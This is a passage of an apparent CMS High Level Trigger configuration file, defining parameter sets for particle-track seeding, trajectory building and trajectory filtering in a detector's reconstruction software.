track_prob_min = cms.double( -1.0 ),
track_pt_min = cms.double( 0.1 )
)
HLTSeedFromConsecutiveHitsTripletOnlyCreator = cms.PSet(
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
SeedMomentumForBOFF = cms.double( 5.0 ),
propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
forceKinematicWithRegionDirection = cms.bool( False ),
magneticField = cms.string( "ParabolicMf" ),
OriginTransverseErrorMultiplier = cms.double( 1.0 ),
ComponentName = cms.string( "SeedFromConsecutiveHitsTripletOnlyCreator" ),
MinOneOverPtError = cms.double( 1.0 )
)
HLTIter2GroupedCkfTrajectoryBuilderIT = cms.PSet(
keepOriginalIfRebuildFails = cms.bool( False ),
lockHits = cms.bool( True ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2PSetTrajectoryFilterIT" ) ),
doSeedingRegionRebuilding = cms.bool( False ),
useHitsSplitting = cms.bool( False ),
maxCand = cms.int32( 2 ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
bestHitOnly = cms.bool( True ),
useSameTrajFilter = cms.bool( True ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
cleanTrajectoryAfterInOut = cms.bool( False ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( False ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2PSetTrajectoryFilterIT" ) ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTIter3PSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter3ESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter3PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 1 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutTight = cms.PSet( value = cms.double( 1945.0 ) )
HLTPSetCkf3HitTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 2 ),
minPt = cms.double( 0.075 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMuonTrackingRegionBuilder8356 = cms.PSet(
Rescale_Dz = cms.double( 3.0 ),
Pt_fixed = cms.bool( False ),
Eta_fixed = cms.bool( False ),
Eta_min = cms.double( 0.1 ),
DeltaZ = cms.double( 15.9 ),
maxRegions = cms.int32( 2 ),
EtaR_UpperLimit_Par1 = cms.double( 0.25 ),
UseVertex = cms.bool( False ),
Z_fixed = cms.bool( True ),
PhiR_UpperLimit_Par1 = cms.double( 0.6 ),
PhiR_UpperLimit_Par2 = cms.double( 0.2 ),
Rescale_phi = cms.double( 3.0 ),
DeltaEta = cms.double( 0.2 ),
precise = cms.bool( True ),
OnDemand = cms.int32( -1 ),
EtaR_UpperLimit_Par2 = cms.double( 0.15 ),
MeasurementTrackerName = cms.InputTag( "hltESPMeasurementTracker" ),
vertexCollection = cms.InputTag( "pixelVertices" ),
Pt_min = cms.double( 1.5 ),
beamSpot = cms.InputTag( "hltOnlineBeamSpot" ),
Phi_fixed = cms.bool( False ),
DeltaR = cms.double( 0.2 ),
input = cms.InputTag( 'hltL2Muons','UpdatedAtVtx' ),
DeltaPhi = cms.double( 0.2 ),
Phi_min = cms.double( 0.1 ),
Rescale_eta = cms.double( 3.0 )
)
HLTPSetDetachedCkfTrajectoryFilterForHI = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 0.701 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter3PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMuTrackJpsiTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMuTrackJpsiTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
maxCand = cms.int32( 1 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTrajectoryBuilderForGsfElectrons = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 90.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "hltESPBwdElectronPropagator" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTrajectoryFilterForElectrons" ) ),
propagatorAlong = cms.string( "hltESPFwdElectronPropagator" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator2000" ),
intermediateCleaning = cms.bool( False ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutNone = cms.PSet( value = cms.double( -1.0 ) )
HLTPSetTobTecStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMuonCkfTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetbJetRegionalTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 8 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CompositeTrajectoryFilter" ),
filters = cms.VPSet(
cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilterBase" ) )
)
)
HLTIter1PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.2 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedCkfTrajectoryFilterForHIGlobalPt8 = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 8.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 0.701 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMixedStepTrajectoryBuilder = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMixedStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.05 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetCkfTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTSeedFromProtoTracks = cms.PSet(
TTRHBuilder = cms.string( "hltESPTTRHBuilderPixelOnly" ),
SeedMomentumForBOFF = cms.double( 5.0 ),
propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
forceKinematicWithRegionDirection = cms.bool( False ),
magneticField = cms.string( "ParabolicMf" ),
OriginTransverseErrorMultiplier = cms.double( 1.0 ),
ComponentName = cms.string( "SeedFromConsecutiveHitsCreator" ),
MinOneOverPtError = cms.double( 1.0 )
)
HLTPSetInitialStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 2 ),
minPt = cms.double( 0.2 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2PSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter2ESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMuTrackJpsiTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 10.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 8 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTSeedFromConsecutiveHitsCreatorIT = cms.PSet(
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
SeedMomentumForBOFF = cms.double( 5.0 ),
propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
forceKinematicWithRegionDirection = cms.bool( False ),
magneticField = cms.string( "ParabolicMf" ),
OriginTransverseErrorMultiplier = cms.double( 1.0 ),
ComponentName = cms.string( "SeedFromConsecutiveHitsCreator" ),
MinOneOverPtError = cms.double( 1.0 )
)
HLTPSetTrajectoryFilterL3 = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.5 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 1000000000 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedStepTrajectoryBuilder = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelPairCkfTrajectoryFilterForHIGlobalPt8 = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 8.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
